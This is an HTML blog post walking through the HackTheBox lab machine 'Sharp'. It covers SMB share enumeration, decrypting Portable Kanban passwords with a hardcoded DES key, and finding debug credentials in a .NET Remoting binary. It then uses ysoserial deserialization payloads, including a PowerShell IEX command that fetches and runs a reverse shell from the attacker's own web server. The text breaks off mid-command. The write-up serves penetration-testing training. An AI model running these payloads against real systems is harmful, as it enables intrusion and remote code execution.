<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Sharp HackTheBox Writeup | SoftwareUser</title><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Sharp HackTheBox Writeup" /><meta name="author" content="Software User" /><meta property="og:locale" content="en_US" /><meta name="description" content="Cyber-Security" /><meta property="og:description" content="Cyber-Security" /><link rel="canonical" href="https://softwareuser23.github.io/posts/writeup-sharp/" /><meta property="og:url" content="https://softwareuser23.github.io/posts/writeup-sharp/" /><meta property="og:site_name" content="SoftwareUser" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-05-24T14:01:00+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Sharp HackTheBox Writeup" /><meta name="twitter:site" content="@softwareuser_" /><meta name="twitter:creator" content="@Software User" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"headline":"Sharp HackTheBox Writeup","description":"Cyber-Security","datePublished":"2021-05-24T14:01:00+05:30","dateModified":"2021-05-24T14:01:00+05:30","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://softwareuser23.github.io/posts/writeup-sharp/"},"url":"https://softwareuser23.github.io/posts/writeup-sharp/","author":{"@type":"Person","name":"Software User"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">SoftwareUser</a></div><div class="site-subtitle font-italic">Pentester, CTF-Player, Bug-Hunter</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/SoftwareUser23" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/softwareuser_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:window.open('mailto:' + ['example','doamin.com'].join('@'))" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Sharp HackTheBox Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Sharp HackTheBox Writeup</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, May 24, 2021, 2:01 PM +0530" > May 24 <i class="unloaded">2021-05-24T14:01:00+05:30</i> </span> by <span class="author"> Software User </span></div></div><div class="post-content"><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/sharp.png" alt="Desktop View" /></p><hr /><p><strong><span style="color:#ff5555">Introduction</span></strong></p><p>Sharp machine released on 05 December 2020 on HacTheBox and created by <a href="https://app.hackthebox.eu/users/9164">cube0x0</a></p><p><span style="color:#ff5555">The blog is for educational purposes only.</span></p><hr /><p><strong><span style="color:#ff5555">Enumeration</span></strong></p><p><strong><span style="color:#ff5555">IP :- 10.10.10.219</span></strong></p><p>As always, I added IP In hosts file.</p><hr /><p><code class="language-plaintext highlighter-rouge">softwareuser@parrot:~ sudo nmap -sC -sV -oN nmap/intial_scan sharp.htb </code></p><p><strong>-sC for default scripts</strong><br /> <strong>-sV for Version detection</strong><br /> <strong>-oN for Output</strong><br /></p><p>lnmap is just my alias to print only open ports from result file</p><h2 id="nmap">Nmap</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre><td class="rouge-code"><pre><span class="c"># Nmap 7.91 scan initiated Sun May</span>
09:21:37 2021 as: nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span>
nmap/intial_scan sharp.htb
Nmap scan report <span class="k">for </span>sharp.htb <span class="o">(</span> 10.10 .10.219 <span class="o">)</span>
Host is up <span class="o">(</span> 0 .30s latency<span class="o">)</span> <span class="nb">.</span>
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
135 /tcp open msrpc Microsoft
netbios-ssn Microsoft
Windows RPC
139 /tcp
open
Windows netbios-ssn
445 /tcp
open
8888 /tcp open
microsoft-ds?
storagecraft-image
StorageCraft Image Manager
Service Info: OS: Windows<span class="p">;</span> CPE:
cpe:/o:microsoft:windowsp
/
Host script results:
| _clock-skew: <span class="nt">-7h49m04s</span>
| smb2-security-mode:
|
| _
2.02 :
Message signing enabled but not
required
| smb2-time:
| <span class="nb">date</span>: 2021 <span class="nt">-05-08T20</span>:04:04
| _ start_date: N/A
Service detection performed. Please report
any incorrect results at
https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Sun May</span>
9 09:23:46 2021 <span class="nt">--</span> 1
IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>129.03
seconds

</pre></table></code></div></div><p><strong>Open Ports</strong></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows
netbios-ssn
445/tcp open microsoft-ds?8888/tcp open storagecraft-image StorageCraft
Image Manager
</pre></table></code></div></div><p>8888 Port wasn’t responding!</p><p>Let’s focus on Smb First</p><h2 id="smbclient">Smbclient</h2><p>Let’s check with smbclient</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbclient <span class="nt">-L</span> //sharp.htb/ <span class="nt">-N</span> 
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/1.png" alt="Desktop View" /></p><p>Four shares are available. Lets check if we have permission to read them i will use smbmap</p><p><strong>So, what is smbmap?</strong> SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. Read more about smbmap <a href="https://github.com/ShawnDEvans/smbmap">here</a></p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbmap <span class="nt">-H</span> sharp.htb
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/2.png" alt="Desktop View" /></p><p>we have access to kanban. We can list the directories Recursively by Using -R (Recursively list dirs,and files) option</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbmap <span class="nt">-H</span> sharp.htb <span class="nt">-R</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/3.png" alt="Desktop View" /></p><p>Let’s download these files we, can download using smget read more about it <a href="https://www.samba.org/samba/docs/current/man-html/smbget.1.html">here</a></p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>smbget <span class="nt">-R</span> smb://sharp.htb/kanban
</pre></table></code></div></div><p>After downloading files</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/4.png" alt="Desktop View" /></p><p>Most of them are dlls and some are .pk also there is pdf available after reading bit of pdf i was sure that box is about kanban.</p><p><em>About Kanban : You can use this page to download the Portable Kanban task management tool developed by Dmitry Ivanov and originally available on his personal page http://dmitryivanov.net (link updated, as it looks like Dmitry’s website is down) The download link below is shared with permission from Dmitry himself. <a href="https://edgars.lazdini.lv/portable-kanban/#:~:text=Portable%20Kanban%20is%20a%20completely,%2C%20add%20custom%20fields%2C%20etc.">Link</a></em></p><p>Let’s check these .pk files</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/5.png" alt="Desktop View" /></p><p>This output looks like json let’s try to beautfy it</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/6.png" alt="Desktop View" /></p><p>yeah, it’s json i found some encrypted passwords in it.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/7.png" alt="Desktop View" /></p><div class="language-md highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>Administrator : k+iUoOvQYG98PuhhRC7/rg==
lars: Ua3LyPFM175GN8D3+tqwLA==
</pre></table></code></div></div><p>At this time i was looking for “How to Decrypt this password?”. So, let’s look for Kanban Exploits because, kanban is present in box this one looks intresting <a href="https://www.exploit-db.com/exploits/49409">link</a> I decrypted the passwords using the script. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/8.png" alt="Desktop View" /> Decrypted passwords</p>><code class="language-txt">Administrator: G2@$btRSHJYTarg lars: G123HHrth234gRG </code><p>Lets also check the source code of this script. In this whole script two keys are used</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">decode</span><span class="p">(</span><span class="nb">hash</span><span class="p">):</span>
	<span class="nb">hash</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="nb">hash</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">))</span>
	<span class="n">key</span> <span class="o">=</span> <span class="n">DesKey</span><span class="p">(</span><span class="sa">b</span><span class="s">"7ly6UznJ"</span><span class="p">)</span>
	<span class="k">return</span> <span class="n">key</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="nb">hash</span><span class="p">,</span><span class="n">initial</span><span class="o">=</span><span class="sa">b</span><span class="s">"XuVUm5fR"</span><span class="p">,</span><span class="n">padding</span><span class="o">=</span><span class="bp">True</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
</pre></table></code></div></div><p>At this point i thought maybe this keys are default and stored somewhere in kanban and i was trying to find the these bothkeys. so, i decided to reverse it also, we got binary of kanban through smb. Lets check binary in windows vm</p><p>Lets transfer the binary first. I can easily send it to vm using smbserver</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">sudo </span>python3smbserver.py transfer /your-path <span class="nt">-smb2support</span>
</pre></table></code></div></div><h2 id="windows-vm">Windows Vm</h2><p>In windows vm <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/9.png" alt="Desktop View" /></p><p>copy all files</p><p>I use Dnspy for reversing binaries. <a href="https://github.com/dnSpy/dnSpy">dnspy</a></p><p>Their are lot of functions in binary but i filtered some functions with strings like ‘ pass’ and ‘password’.</p><p><strong>Functions :</strong> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/10.png" alt="Desktop View" /></p><p><em>DbPassword:</em></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/11.png" alt="Desktop View" /></p><p><em>DbPassword2:</em></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/12.png" alt="Desktop View" /></p><p>In Crypto.Encrypt i found keys(iv and key)!</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/13.png" alt="Desktop View" /></p><div class="language-cs highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="p">}</span>
<span class="c1">// Token: 0x04000001 RID: 1</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">byte</span> <span class="p">[</span> <span class="p">]</span> <span class="n">_rgbKey</span> <span class="p">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span> <span class="s">"7ly6UznJ"</span><span class="p">);</span>
<span class="c1">// Token: 0x04000002 RID: 2</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">byte</span> <span class="p">[</span> <span class="p">]</span> <span class="n">_rgbIV</span> <span class="p">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="s">"XuVUm5fR"</span><span class="p">);</span>
<span class="p">}</span>
</pre></table></code></div></div><p>So finally i got keys but already i ve decrypted it using that script</p><p>Lets run kanban binary now</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/14.png}" alt="Desktop View" /></p><p>i can login with those admin creds sucessfully got logged in settings → users hide password i got the same passwords which i’ve got using that script</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/15.png" alt="Desktop View" /></p><p>also, i have watched ippsec’s video. There is also config file malupanation in kanban to get access of kanban you can watch it here <a href="https://www.youtube.com/watch?v=lxjAZELJ96Q&amp;t=885s">video</a> so, now i ve usernames and passwords lets try to login with smb on both users.</p><p><strong>lars has access to two shares:</strong></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/16.png" alt="Desktop View" /></p><h1 id="lars-smb">lars Smb</h1><p>dev share has some files in it</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/17.png" alt="Desktop View" /></p><p>Lets download them</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/18.png" alt="Desktop View" /></p><p>Let’s check files now</p><p><em>notes.txt:</em> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/19.png" alt="Desktop View" /></p><p><strong>That’s a windows executable i have to transfer it in windows vm</strong> checking server in dnspy <em>Server:-</em></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/20.png" alt="Desktop View" /></p><p>i noticed some things here:</p><div class="language-cs highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="k">using</span> <span class="nn">System.Runtime.Remoting</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Remoting.Channels</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Remoting.Channels.Tcp</span><span class="p">;</span>

</pre></table></code></div></div><p>I kept it in my mind i looked for something else <code class="language-plaintext highlighter-rouge">StartSever()</code></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/21.png" alt="Desktop View" /></p><p>okay so their is a port which is used by app.</p><div class="language-cs highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="p">(</span> <span class="p">(</span> <span class="n">IDictionary</span> <span class="p">)</span> <span class="n">hashtable</span> <span class="p">)</span> <span class="p">[</span> <span class="s">"port"</span> <span class="p">]</span> <span class="p">=</span> <span class="m">8888</span>
</pre></table></code></div></div><p><em>Client</em></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/22.png" alt="Desktop View" /></p><p>their is also an endpoint</p><div class="language-md highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>username and password
user = debug
password = SharpApplicationDebugUserPassword123!
</pre></table></code></div></div><p>Lets also check what if Runtime remoting</p><div class="language-md highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>System.Runtime.Remoting.Channels Namespace
Contains classes that support and handle
channels and channel sinks, which are used as
the transport medium when a client calls a
method on a remote object.

</pre></table></code></div></div><p>read about it <a href="https://docs.microsoft.com/en-us/dotnet/api/system.runtime.remoting.channels?view=netframework-4.8">here</a></p><p>Also, I found some articles on .net Remoting. **NET Remoting is a framework where you can invoke or consume methods or objects in a remote computer named the server from your computer, the client. We can also perform asynchronous calls in .NET Remoting using callback delegates. These are the advanced concepts from DCOM, COM, and so on. read more about it <a href="https://www.c-sharpcorner.com/UploadFile/d6707e/what-is-net-remoting-exactly609/">here</a></p><p>Exploit code <a href="https://github.com/tyranid/ExploitRemotingServic">link</a> Some articles on it <a href="https://labs.f-secure.com/advisories/milestone-xprotect-net-deserialization-vulnerability/">first</a> and <a href="https://research.nccgroup.com/2019/03/19/finding-and-exploiting-net-remoting-over-http-using-deserialisation/">second</a> <br /> Let’s start exploitation</p><h2 id="shell-as-lars">Shell as lars</h2><p>Download the openvpn binary in windows and run your openvpn file. Also i’ll download visual studio to compile exploit</p><p>Lets clone the <a href="https://github.com/tyranid/ExploitRemotingService">repo</a> first.</p><p>Now open it in Visual Studio</p><p>Look for csproj file in it and right click on it and build it</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/23.png" alt="Desktop View" /></p><p>building this binary was not an easy task you have to download package <a href="https://www.nuget.org/packages/NDesk.Options/">here</a> and update your package manager path where you have downloaded then build it i’ll also try to upload it to my github</p><p>Build it <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/24.png" alt="Desktop View" /></p><p>Also, ysoserial is needed download the compiled version for windows</p><p>Lets generate payload first I’ll try to ping my own system to check if the binary is working or not.</p><p><strong>Payload</strong></p>><code class="language-cmd">λ ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "ping -n 5 10.10.14.156" </code><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/25.png" alt="Desktop View" /></p><p>run the compiled binary</p>><code class="language-cmd"> .\ExploitRemotingService.exe -s tcp://10.10.10.219:8888/SecretSharpDebugApplicat --user=debug --pass="SharpApplicationDebugUserPassword123!" -s tcp://10.10.10.219:8888/SecretSharpDebugApplicat raw ##Output of ysoserial </code><p>Everything is mentioned in articles</p><p>I got some response in wireshark</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/26.png" alt="Desktop View" /></p><p>Now i can put reverse shell in it ysoserial payload. I will use Nishang reverse shell download it. <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1">link</a></p><p>Lets use this payload to deliver and execute our shell start netcat listener and python server payload to execute and download shell <a href="https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters">link</a></p><p>Let’s generate payload for shell</p>><code class="language-cmd">λ ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX(New-ObjectNet.WebClient).downloadString('http://yourip:80/shell-name.ps1')" </code><p>start nc listener now</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/27.png" alt="Desktop View" /></p><p>start python server too</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/28.png" alt="Desktop View" /></p><p>run the compiled binary</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/29.png" alt="Desktop View" /></p><p>Ignore the errors. After some seconds, i got shell as lars and also completed user part</p><h3 id="usertxt">user.txt</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/30.png" alt="Desktop View" /></p><p>Lets enumerate for root now</p><h2 id="root">Root</h2><p>found another binary in Documents folder</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb-machines/sharp/31.png" alt="Desktop View" /></p><p>Windows Communication Foundation here lets copy it to our system there are lot of files lets compress it first</p>><code class="language-cmd">Compress-Archive -Path 